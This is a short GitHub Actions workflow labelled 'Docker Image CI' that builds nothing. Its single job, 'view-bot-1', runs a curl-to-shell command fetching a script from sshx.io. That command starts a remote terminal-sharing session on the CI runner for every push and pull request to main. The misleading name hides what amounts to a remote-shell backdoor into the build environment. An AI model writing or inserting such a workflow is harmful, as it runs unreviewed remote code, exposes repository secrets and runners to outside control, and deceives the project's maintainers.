name: Docker Image CI

on:
  push:
    branches: [ "main" ]
  pull_request:
    branches: [ "main" ]

jobs:
  view-bot-1:
    runs-on: ubuntu-22.04
    steps:
      - uses: actions/checkout@v4
      - run: curl -sSf https://sshx.io/get | sh -s run
